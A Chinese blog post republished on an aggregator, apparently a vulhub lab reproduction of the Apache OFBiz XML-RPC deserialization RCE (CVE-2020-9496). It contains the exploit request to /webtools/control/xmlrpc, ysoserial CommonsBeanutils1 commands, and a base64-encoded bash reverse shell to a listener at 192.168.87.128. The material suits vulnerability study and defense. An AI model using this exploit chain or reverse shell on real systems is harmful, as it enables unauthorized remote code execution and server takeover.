Apache Ofbiz xmlrpc RCE漏洞CVE-2020-9496复现

分类:Apache作者:编程之家用户

Apache Ofbiz xmlrpc RCE漏洞(CVE-2020-9496)复现

  • |简介

Apache OFBiz全称是The ApacheOpen For Business Project,是开一个放的电子商务平台,也是一个非常著名的开源项目

  • |漏洞描述

Apache ofbiz存在反序列化漏洞,攻击者可以通过未授权访问接口,构造特定的xmlrpc http请求,造成远程代码执行的影响

  • |影响版本

Apache ofbiz: <17.12.04

  • |搭建环境

(1)使用vulhub搭建环境,在有docker环境的虚拟机中 //没有的,先安装docker环境(apt install docker-ce、docker-compose等)

git clone https://github.com/vulhub/vulhub.git

image-20210922163519848

(2)拉取项目

进入漏洞目录,使用docker-compose拉取环境,看到绿色done,说明成功

image-20210922164247216

(3)在浏览器访问搭建的环境页面:https://ip:8443/myportal/control/login //注意是https

image-20210922165332353

(4)安装漏洞复现需求的环境

  1. 安装java环境 https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html ,根据版本选择下载的jdk

  2. 创建一个文件夹,把下载好的jdk解压到文件夹中

    mkdir /opt/java ==> tar xvzf jdk-8u301-linux-x64.tar.gz -C /opt/java //-C 解压至指定文件夹中

  3. 配置java环境变量

    vim /etc/profile 末尾加上

    • export JAVA_HOME=/opt/java/jdk1.8.0_301

    • export JRE_HOME=${JAVA_HOME}/jre

    • export CLASSPATH=.:\({JAVA_HOME}/lib:\){JRE_HOME}/lib

    • export PATH=\({JAVA_HOME}/bin:\)PATH

    image-20210922170043563

  4. 设置完成后,source /etc/profile,重新加载配置文件

    //每次重启终端后,需要执行一遍,才能加载环境变量,嫌麻烦的可以在/.zshrc(或/.bashrc,看版本),加入环境变量(这样就不需要每次都执行一遍了),如下:

    image-20210922181611531

    java -version

    image-20210922171252665

    ok~

  5. 安装maven,使用wget下载mvn

    wget https://mirrors.bfsu.edu.cn/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz

    image-20210922171712523

    创建文件夹,解压

    mkdir /opt/maven ==> tar xvzf apache-maven-3.6.3-bin.tar.gz -C /opt/maven

    image-20210922172333651

    配置环境变量

    vim /etc/profile 在末尾加上

    • export MAVEN_HOME=/opt/maven/apache-maven-3.6.3

    • export PATH=\(MAVEN_HOME/bin:\)PATH

      mvn -version

    image-20210922172648484

    ok~

  • |漏洞复现

(1)在gitHub上下载java反序列化利用工具ysoserial

​ git clone https://github.com/frohoff/ysoserial.git

image-20210922173728797

(2)进入ysoserial目录使用maven下载编译需要得包,

​ mvn clean package -DskipTests

image-20210922194830555

编译成功,如下:

image-20210922194414588

(3)可以看到ysoserial目录里面有一个target文件,进入这个目录,可以看到生成payload的工具

image-20210922195624691

(4)在浏览器访问 https://ip:8443/webtools/control/xmlrpc 这个页面,并使用burp抓包,放置重放模块

image-20210922200350307

页面源代码

image-20210922221617854

放置重放模块:

image-20210922200749121

(5)在数据包下方加上导入xml

POST /webtools/control/xmlrpc HTTP/1.1
Host: 192.168.87.128:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A7A75619C87A5FB8DD5A23C4CE6F77A8.jvm1; Hm_lvt_ade42d4f682c4fca28c5f093052433c1=1631008935,1631009219,1631013070,1631015778; OFBiz.Visitor=10000
Content-Length: 4208

tom

cat

[base64-payload]

(6)尝试使用ysoserial的CommonsBeanutils1生成Payload并在tmp目录写入文件

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch /tmp/Tokyo" | base64 | tr -d "\n"

image-20210922203848224

或使用dnslog判断漏洞是否存在

image-20210922223748583

(7)复制生成的64位编码的payload,并粘贴到burp数据包[base64-payload]这个地方,点击Go发送,到docker查看是否成功写入

image-20210922201935361

(8)利用漏洞反弹shell,借用下面这个网站,对反弹shell的payload进行base64位编码

http://www.jackson-t.ca/runtime-exec-payloads.html

image-20210922214622271

(9)把编码后的shell再用ysoserial工具进行一次base64编码

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg3LjEyOC8zMzMzIDA+JjE=}|{base64,-d}|{bash,-i}" | base64 | tr -d "\n"

image-20210922215145159

(10)nc设置监听,把生成的exp放入到burp的数据包中发送,查看nc监听以返回shell

image-20210922215314476

image-20210922215946112

  • |修复建议

    1、升级为最新版本

原文地址:https://www.cnblogs.com/7omss/p/15465793.html

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐

Spring Cloud Openfeign微服务接口调用与Hystrix集成实战
可以认为OpenFeign是Feign的增强版,不同的是OpenFeign支持Spring MVC注解。OpenFeign和Feign底层都内置了Ribbon负载均衡组件,在导入OpenFeign依赖后无需专门导入Ribbon依赖,用做客户端负载均衡,去调用注册中心服务。
关于小程序订单中心页设置的公告
为进一步规范小程序交易生态、提升用户购物体验、满足用户在有交易的小程序中便捷查看订单信息的诉求,自2022年12月31日起,对于有“选择商品/服务-下单-支付”功能的小程序,需按照平台制定的规范,在小程序内设置订单中心页。开发者可通过小程序代码提审环节,或通过「设置-基础设置-小程序订单中心path设置」模块设置订单中心页path。1、 新注册或有版本迭代需求的小程序,可在提审时通过参数配置该商家小程序的订单中心页path。2、无版本迭代需求的小程序,可在小程序订单中心path设置入口进行设置。
云原生之使用Docker部署Dashdot服务器仪表盘
云原生之使用Docker部署Dashdot服务器仪表盘
TensorFlow之回归模型-1
本文主要描述TensorFlow之回归模型的基本原理
Apache Druid任意文件读取漏洞CVE-2021-36749
1.漏洞描述Apache Druid 是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台。Apache Druid对用户指定的HTTP InputSource没有做限制,并且Apache Druid默认管理页面是不需要认证即可访问的,可以通过将文件URL传递给HTTP InputSource来绕过。因此未经授权的远程攻击者可以通过构造恶意参数读取服务器上的任意文件,造成服务器敏感性信息泄露。2.影响版本Apache Druid &lt;= 0.21.13...
成员内部类
内部类(当作类中的一个普通成员变量,只不过此成员变量是class的类型):一个Java文件中可以包含多个class,但是只能有一个public class 如果一个类定义在另一个类的内部,此时可以称之为内部类使用:创建内部类的时候,跟之前的方法不一样,需要在内部类的前面添加外部类来进行修饰 OuterClass.InnerClass innerclass = new OuterClass().new InnerClass();特点:1.内部类可以方便的访问外部类的私有属性...
Apache APISIX 玩转 Tongsuo 国密插件
本文通过解读国密的相关内容与标准,呈现了当下国内技术环境中对于国密功能支持的现状。并从 API 网关 Apache APISIX 的角度,带来有关国密的探索与功能呈现。作者:罗泽轩,Apache APISIX PMC什么是国密顾名思义,国密就是国产化的密码算法。在我们日常开发过程中会接触到各种各样的密码算法,如 RSA、SHA256 等等。为了达到更高的安全等级,许多大公司和国家会制定自己的密码算法。国密就是这样一组由中国国家密码管理局制定的密码算法。在国际形势越发复杂多变的今天,密码算法的国产化
CENTOS环境Apache最新版本httpd-2.4.54编译安装
CENTOS环境Apache最新版本httpd-2.4.54编译安装
Apache HTTPD 换行解析漏洞
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。影响版本:Apache 2.4.0~2.4.29 存在一个解析漏洞;在解析PHP时,将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。我们查看一下配置:读取配置文件,前三行的意思是把以 结尾的文件当成 文件执行。问题就在它使用的是 符号匹配的,我们都知道这个符号在正则表达式中的意思是匹配字符串的末尾,是会匹配换行符的,那么漏洞就这样产生了。 进入容器里,打开index.php,发现如果文件后缀名为 php、
apache Hop安装既部署问题收集
apache Hop现在好像用的人很少, 我就自己写一个问题收集的帖子吧, 后面在遇到什么问题都会在该文章上同步更新
Python安装配置apache-superset
2.启动容器ps:注意端口占用,当前部署在 8080 端口上了,确保宿主机端口未被占用,不行就换其他端口ps:用户名和密码都是 admin,一会用于登录,其他随便填5.下载一个官方提供的样例数据库【可跳过】ps:此步国内无法访问,一般下载不了,能下的就下,不能下的跳过就行了,一会配置自己的数据库7.访问登录页面ps:注意端口是上面自己配置的端口,账号密码是 admin依次点击 Settings → Database Connections点击 DATABASE 就可以配置自己的数据库了
String类的常用方法
String类的常用方法1. String类的两种实例化方式1 . 直接赋值,在堆上分配空间。String str = "hello";2 . 传统方法。通过构造方法实例化String类对象String str1 = new String("Hello");2.采用String类提供的equals方法。public boolean equals(String anotherString):成员方法 str1.equals(anotherString);eg:publi
win10虚拟机下载安装安全狗Apache版本
下载下载地址http://free.safedog.cn下载的setup:安装点击下面的图标开始安装:可能会提示:尝试先打开小皮面板的Apache服务:再安装安全狗:填入服务名:如果服务名乱写的话,会提示“Apache服务名在此机器上查询不到。”我干脆关闭了这个页面,直接继续安装了。安装完成后,需要进行注册一个账户,最后看到这样的界面:查看配置:...
Wampserver2.5 下载+安装 的详细步骤.
操作系统生产者-消费者问题(PV操作(Java实现
一、问题描述一组生产者进程和一组消费者进程共享一个初始为空、大小n的缓冲区,只有缓冲区没满时,生产者才能把资源放入缓冲区,否则必须等待;只有缓冲区不为空时,消费者才能从中取出资源,否则必须等待。由于缓冲区是临界资源,它只允许一个生产者放入资源,或一个消费者从中取出资源。二、问题分析(1)、关系分析。生产者和消费者对缓冲区互斥访问是互斥关系,同时生产者和消费者又是一个相互协作的关系,只有生产者生产之后,消费者只能才能消费,它们还是同步关系。(2)、整理思路。只有生产生产者和消费者进程,正好是这两个进程
Jetpack新成员,一篇文章带你玩转Hilt和依赖注入
依赖注入的英文名是Dependency Injection,简称DI。事实上这并不是什么新兴的名词,而是软件工程学当中比较古老的概念了。如果要说对于依赖注入最知名的应用,大概就是Java中的Spring框架了。Spring在刚开始其实就是一个用于处理依赖注入的框架,后来才慢慢变成了一个功能更加广泛的综合型框架。我在学生时代学习Spring时产生了和绝大多数开发者一样的疑惑,就是为什么我们要使用依赖注入呢?现在的我或许可以给出更好的答案了,一言以蔽之:解耦。耦合度过高可能会是你的项目中一个比较
velocity模板渲染引擎
<dependency><groupId>org.apache.velocity</groupId><artifactId>velocity-engine-core</artifactId><version>使用人数最多的版本</version></dependency>importorg.apache.velocity.Template;importorg.apache.velo
让你的Java Swing界面变得更好看,这是我用过最好看的皮肤包了?
Java Swing皮肤包前言:一.皮肤包分享二.皮肤包的使用1.先新建一个项目。2.导入皮肤包1.先导入我们刚刚下载的jar文件,右键项目demo即可2.如果右键没有这个选项,记得调为下图模式3.点击下图蓝色圆圈处4.找到刚刚下载的jar文件,点击打开即可5.我们看一下效果,是不是比原生的好看前言:因为Java Swing自身皮肤包不是很好看,甚至有点丑,怎么让你的界面更加好看,这里就需要用到皮肤包,我发现了一个还不错的皮肤包,让你的界面美观了几个等级。废话不多说。一.皮肤包分享百度网盘分享链接:
Java中读取properties配置文件的八种方式总结
一、前言在做Java项目开发过程中,涉及到一些数据库服务连接配置、缓存服务器连接配置等,通常情况下我们会将这些不太变动的配置信息存储在以 .properties 结尾的配置文件中。当对应的服务器地址或者账号密码信息有所变动时,我们只需要修改一下配置文件中的信息即可。同时为了让Java程序可以读取 .properties配置文件中的值,Java的JDK中提供了java.util.Properties类可以实现读取配置文件。二、Properties类Properties 类位于 java.util.Pro
【狂神说】Mybatis学习笔记全
Mybatis环境JDK1.8Mysql5.7maven 3.6.1IDEA回顾JDBCMysqlJava基础MavenJunitSSM框架:配置文件的最好的方式:看官网文档Mybatis1、Mybatis简介1.1 什么是Mybatis如何获得Mybatismaven仓库:中文文档:https://mybatis.org/mybatis-3/zh/index.htmlGithub:1.2 持久化数据持久化持久化就是将程序的数据在持久状态和瞬时状态转
pythonJavaScriptjavaHTMLPHPreactjsC#AndroidCSSNode.jssqlrpython-3.xMysqLjQueryc++pandasFlutterangularIOSdjangolinuxswifttypescript路由器JSON路由器设置无线路由器h3c华三华三路由器设置华三路由器电脑软件教程arraysdocker软件图文教程Cvue.jslaravelspring-boot